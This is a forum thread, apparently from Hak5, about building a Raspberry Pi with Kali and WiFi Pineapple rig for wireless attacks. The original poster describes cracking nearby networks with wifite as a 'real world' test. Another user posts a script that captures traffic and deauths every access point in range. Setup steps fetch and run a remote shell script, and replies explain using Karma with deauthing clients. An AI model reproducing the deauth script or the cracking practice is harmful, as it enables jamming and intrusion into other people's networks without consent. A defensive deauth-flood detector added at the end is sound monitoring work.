
Pineapple Kali Pi



Guest desarmy

UPDATE: 4/16

I already had a USB Rubber Ducky and thanks to the Kali-Linux install script of the Rubber Ducky Payload Generator this device now has a new attack vector, granted I have access to a client station. Thanks Hak5!

UPDATE:

I am now running Kali Linux on a Raspberry Pi.

I am now going to automate as much as I can :wub:

To use the setup I use a tablet and vnc into it

It takes about 3 minutes to power up everything, ssh into pi, startvnc and login


I hooked up the AWUS036NHA to the kali pi and did a real world wifi cracking test (wifite is built into kali)

I found a good spot with multiple networks and the signal strength isn't great; it took around 5 min.


This whole getup is very easy to set up. I will actually be able to use this within 6 months on a client's network.


This is what it all looks like; all parts cost around $350.

Step 1 buy stuff: Buy raspberry pi, wifipineapple, 2 alfas, usb hub, 8gb usb drive, 16gb sdcard, ethernet cable

Step 2 setup pi: http://cdimage.kali.org/kali-images/kali-linux-1.0-armel-raspberrypi.img.gz Download it and write it to the SD card, put it in the Pi, that's it.

Step 3 setup pineapple: http://forums.hak5.org/index.php?/forum/65-mark-iv/

Step 4 power them up: Plug the KaliPi into the pineapple PoE jack. KaliPi automatically tries to connect on eth0.

Step 5 My pi is always assigned the address 172.16.42.157. SSH in to kalipi (pw:toor) install tightvncserver.

Step 6 Install raspi-config on Kali pi

git clone http://github.com/asb/raspi-config.git

cd raspi-config
sh raspi-config
Step 7: Use what the gods gave you
wget wifipineapple.com/wp4.sh
chmod +x wp4.sh
./wp4.sh
If you have questions... pm me!

I am a computer science student and just a nerd that likes to play with things

This is my first post. I recently got a Raspberry Pi and a WiFi Pineapple Mark IV and set them up to work together. I just got a new battery pack (Anker Astro3 10000mAh) and it runs the two of them; it will run for close to 5 hours as pictured. I also use them with the Alfa AWUS036H (not pictured) and the AWUS036NHA. It took a little time but was not that hard. Raspberry Pi instructions, PwnPi and http://forums.hak5.org/index.php?/forum/49-jasager/ I will update as the project gets better, for now...


With the Raspberry Pi you can make any TV or monitor your display with RCA or HDMI. Or SSH and VNC into both devices from your laptop, tablet, or phone.


I am working on complete automation based off the fact that Karma will bring devices to the network, and the pwnpi will attack most hosts on the pineapple network

Making it mobile, I thought about a pizza box but figured a solar backpack was a better bet

In this pic I am using the pineapple with the Alfa AWUS036H and AWUS036NHA.


I decided to use 2 power supplies: anker astro3 10000mAh to run the pineapple and an anker 8400mAh to run the pi


Edited by desarmy

Here's a script I wrote up for my old mark3 for automated pineappling when connected to a backtrack5 laptop. It will require some modification to work with your setup, but it might be a good way to learn :) Hope you can get some value from it. Cheers

#!/bin/sh
#telot presents....:::drum roll:::
#One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy!
#Note that this script makes quite a few assumptions. They are:
#You are using backtrack5R1.
#Your interface that is connecting to the internet is wlan0
#Your interface that is connecting to the pineapple is eth0
#You have a alfa realtek usb card capable of monitor mode plugged in.
#You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script).
#You have not run wp3.sh or any other network configuration stuff.
#You have your pineapple configured to autostart karma at bootup.
#This script is meant to run on your laptop upon bootup.
#Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant.
#So the internet I'm serving up in my pentest lab is actually run through my cellphone.
#So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth.
#Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah
#I'm keeping most configuration and capture files on the desktop for ease.
cd /root/Desktop/
#Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line.
#iwconfig wlan0 essid EssidOfAPyouWantToUse
#-Dwext selects the wext driver backend (the original post had "Dwext" without the leading dash)
wpa_supplicant -B -Dwext -i wlan0 -c Jack.conf
dhclient wlan0
#Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary.
#Bring up Ethernet Interface directly connected to Pineapple
ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up
# Enable IP Forwarding
echo '1' > /proc/sys/net/ipv4/ip_forward
echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
cat /proc/sys/net/ipv4/ip_forward
#clear chains and rules
iptables -X
iptables -F
echo iptables chains and rules cleared
#setup IP forwarding: new connections arriving from the pineapple subnet on eth0 are forwarded out the internet interface wlan0
#(the original line read "-i wlan0 -o wlan0", which never matches traffic coming in from eth0; wp3.sh uses eth0 as the inbound interface)
iptables -A FORWARD -i eth0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
echo IP Forwarding Enabled
#remove default route
route del default
echo Default route removed
#add default gateway
route add default gw 192.168.1.1 wlan0
echo Pineapple Default Gateway Configured
#instructions
#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
ping -c3 172.16.42.1
if [ $? -eq 0 ]; then
echo "ICS configuration successful."
#echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
#echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
#echo "Enter Pineapple password if prompted"
#ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
fi
echo ""
echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!"
echo ""
#Now on to the fun stuff!
#
#
#
#Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit.
#Remember to screen -r back to it and get rid of it when you're done.
screen -d -m wireshark -i eth0 -k -w sharkcap &
#This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop).
#This is also created in a detached screen. So remember to cleanup when you're done!
#
#
#Now we deauth every access point around us. Make sure to set a conf file (in my case, I call it yourescrewed.conf) for airdrop with your allows and denys.
#I set mine to allow the pineapple & my hotspot and deny everyone else.
ifconfig wlan1 up
airmon-ng start wlan1
cd /pentest/wireless/airdrop-ng/
screen -d -m airodump-ng mon0 -w capfile --output-format csv
sleep 20
python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf

telot
Edited by telot


Never having actually used a pineapple I'm working on the assumption that there is a web GUI for carrying out attacks as well as backend scripts for automation. That being said, I'm curious as to whether code from Jasager responsible for the above could be borrowed and implemented in PwnPi for instance. Also, for a drop box easy use and automation through scripts/web UI is critical for fast deployment. Curious what people's thoughts are here, but it seems that with an RPi, two Alfas, USB hub and power source you can create a far more powerful and flexible pineapple and even a pwn plug for that matter. The possibilities seem wide open.


I've been tinkering around with my Pi and pineapple recently too. It would seem the possibilities are somewhat endless. I also prefer using good ol' wheezy instead of PwnPi; in my experience PwnPi has too many issues as it's still in beta and has yet to work out many a kink. Wheezy, with the right packages installed, is much more stable, and if you remove some of the dead weight (with pen-testing in mind) and boot with a UHS Class 1 SD card then you can speed up your pwnage significantly. imho.



I've been tinkering around with my Pi and pineapple recently too. It would seem the possibilities are somewhat endless. I also prefer using good ol' wheezy instead of PwnPi; in my experience PwnPi has too many issues as it's still in beta and has yet to work out many a kink. Wheezy, with the right packages installed, is much more stable, and if you remove some of the dead weight (with pen-testing in mind) and boot with a UHS Class 1 SD card then you can speed up your pwnage significantly. imho.

Check out Kali for Raspberry Pi, icedevil433. It's a lot more solid than PwnPi for some things. Plus apt-get'ting all those tools on a fresh Raspbian install would be extremely painful...apt-get just takes forever on the Pi!

telot


Guest desarmy

I'd recommend overclocking it to 800MHz though

:)

Thanks, I tried and it was not apparent. raspi-config is not installed on the Kali Pi image. I was able to clone it from GitHub and then run it and set the overclock to 800MHz :lol:

Edited by desarmy

Yep - the raspi-config is also oh-so-necessary for easily expanding the root fs to utilize your entire SD card

telot


OMG I am soooo jealous OP, but thanks for the hacker porn!!!!!

Want to sell me one for a secondhand price loaded with Kali? If so PM me an offer. Btw I heard that the first production run of Raspberry Pi had a lot of glitches -- are they worked out now and what generation/version are you on?

Edited by whitehat

Guest desarmy

OMG I am soooo jealous OP, but thanks for the hacker porn!!!!!

Want to sell me one for a secondhand price loaded with Kali? If so PM me an offer. Btw I heard that the first production run of Raspberry Pi had a lot of glitches -- are they worked out now and what generation/version are you on?

I am using raspberry pi v2


Guest desarmy

Okay, quick question, how do you get the vnc client to actually show anything? I can vnc in, but just get a gray screen and a mouse pointer.

Wait!! Reboot fixed it!!

Are you having fun now?


Guest desarmy

It's a little slow....

True, my next version will be with the odroid-u2. To do it right with a 16GB eMMC Module and accessories is around $200

Edited by desarmy

What if you disconnect the ALFA that is connected via USB to the Raspberry Pi but the Ethernet cable was connected to a WiFi Pineapple Elite, would the WiFi Pineapple Elite still work as a wireless adapter? Or would I still need the ALFA that is just plugged into the Raspberry Pi?

Edited by SydroticKemix

Guest desarmy

What if you disconnect the ALFA that is connected via USB to the Raspberry Pi but the Ethernet cable was connected to a WiFi Pineapple Elite, would the WiFi Pineapple Elite still work as a wireless adapter? Or would I still need the ALFA that is just plugged into the Raspberry Pi?

I use the ALFA with the Raspberry Pi to deauth clients/crack wifi keys; you don't need it.


Guest desarmy

1. What does deauthing do?

2. So you're saying if I don't need the standalone ALFA, that the WiFi Pineapple Elite will act as a WiFi adapter?

1.

http://hackaday.com/2011/10/04/wifi-jamming-via-deauthentication-packets/

The best way to use the wifipineapple is to run karma, and deauth clients on the target network till the clients send out probes, which get answered by the pineapple. The mark iv now does this (I think).

2. It depends, if you want to do a wifi relay you need an alfa to connect to the pineapple; if you are using USB tethering you don't need it. Read the book

https://www.dropbox.com/s/dr6sedfteu8atwq/hak5-mk4-book1e.pdf

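Added example (not code from this thread, from Hak5 or from airdrop-ng): a defender's-side check for the deauthentication bursts discussed in this thread and in the linked hackaday article. It decodes the 802.11 management-frame header of raw frames, counts deauth/disassoc frames per transmitter address and flags transmitters that exceed a threshold; the frame layout follows the 802.11 standard, the sample frames are constructed inline, and the threshold of 10 is an assumption.

```python
import struct
from collections import Counter

# 802.11 management frames: (type, subtype) pairs that tear down a session
DEAUTH = (0, 12)
DISASSOC = (0, 10)

def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt(frame: bytes):
    """Decode the 24-byte 802.11 MAC header of one raw frame.
    Returns (type, subtype, receiver, transmitter, bssid, reason) or None."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]                      # first frame-control byte
    ftype = (fc0 >> 2) & 0x3            # bits 2-3: frame type (0 = management)
    subtype = (fc0 >> 4) & 0xF          # bits 4-7: frame subtype
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if (ftype, subtype) in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]   # little-endian reason code
    return ftype, subtype, mac(addr1), mac(addr2), mac(addr3), reason

def find_deauth_floods(frames, threshold: int) -> dict:
    """Count deauth/disassoc frames per transmitter address and return the
    transmitters whose count exceeds `threshold` within the given frames."""
    counts = Counter()
    for f in frames:
        p = parse_mgmt(f)
        if p and (p[0], p[1]) in (DEAUTH, DISASSOC):
            counts[p[3]] += 1
    return {src: n for src, n in counts.items() if n > threshold}

def build_frame(subtype: int, rx: bytes, tx: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Constructed sample management frame for this demo (not real capture data)."""
    hdr = bytes([subtype << 4, 0]) + b"\x00\x00" + rx + tx + bssid + b"\x00\x00"
    if subtype in (10, 12):
        hdr += struct.pack("<H", reason)
    return hdr

# Constructed sample: an AP beaconing normally, then a burst of broadcast deauths
# carrying that AP's address as transmitter, plus one ordinary client disassoc
AP = bytes.fromhex("001122334455")
BROADCAST = b"\xff" * 6
CLIENT = bytes.fromhex("aabbccddeeff")
SAMPLE = [build_frame(8, BROADCAST, AP, AP) for _ in range(20)]      # beacons
SAMPLE += [build_frame(12, BROADCAST, AP, AP) for _ in range(50)]    # deauth burst
SAMPLE += [build_frame(10, AP, CLIENT, AP, reason=8)]                 # normal disassoc
```

A real deployment would feed frames from a monitor-mode capture and reset the counter per time window; a single address sending dozens of deauths in a few seconds is the signal to alert on.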
